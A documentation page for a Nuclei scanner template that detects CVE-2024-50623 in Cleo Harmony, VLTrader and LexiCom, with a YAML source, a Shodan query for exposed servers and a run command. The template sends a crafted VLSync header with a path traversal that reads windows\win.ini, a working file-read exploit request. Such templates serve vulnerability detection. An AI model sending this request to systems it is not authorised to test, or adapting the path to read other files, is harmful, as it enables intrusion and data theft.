Skip to content
Nuclei Templates

Cleo Harmony < 5.8.0.21 - Arbitary File Read

ID: CVE-2024-50623

Severity: high

Author: DhiyaneshDK

Tags: cve,cve2024,cleo,vltrader,lexicom,harmony,lfi,kev

Description

Section titled “Description”

In Cleo Harmony before 5.8.0.21, VLTrader before 5.8.0.21, and LexiCom before 5.8.0.21, there is an unrestricted file upload and download that could lead to remote code execution.

YAML Source

Section titled “YAML Source”
id: CVE-2024-50623


info:
  name: Cleo Harmony < 5.8.0.21 - Arbitary File Read
  author: DhiyaneshDK
  severity: high
  description: |
    In Cleo Harmony before 5.8.0.21, VLTrader before 5.8.0.21, and LexiCom before 5.8.0.21, there is an unrestricted file upload and download that could lead to remote code execution.
  reference:
    - https://support.cleo.com/hc/en-us/articles/27140294267799-Cleo-Product-Security-Advisory
    - https://github.com/watchtowrlabs/CVE-2024-50623
    - https://labs.watchtowr.com/cleo-cve-2024-50623/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-50623
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2024-50623
    cwe-id: CWE-434
    epss-score: 0.00043
    epss-percentile: 0.10702
  metadata:
    verified: true
    max-request: 2
    shodan-query: 'Server: Cleo'
  tags: cve,cve2024,cleo,vltrader,lexicom,harmony,lfi,kev


flow: http(1) && http(2)


http:
  - raw:
      - |
        GET /Synchronization HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - 'contains(tolower(response), "cleo")'
        internal: true


    extractors:
      - type: regex
        name: version
        part: header
        group: 1
        regex:
          - "Server: Cleo.*?/([0-9.]+)"
        internal: true


  - raw:
      - |
        GET /Synchronization HTTP/1.1
        Host: {{Hostname}}
        VLSync: Retrieve;l=Ab1234-RQ0258;n=VLTrader;v={{version}};a=1337;po=5080;s=True;b=False;pp=myEncryptedPassphrase;path=..\..\..\windows\win.ini


    matchers:
      - type: word
        part: body
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and
# digest: 4a0a00473045022100bafc650ab795bd9d782368c2992d5c3291d79a23fd1abbad1b8fe41b13aa2575022021575f2efc36c0f86f39a67c1e59a67a96f98d1e3cefa6e47518bdbed2adbe1a:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-50623.yaml"

View on Github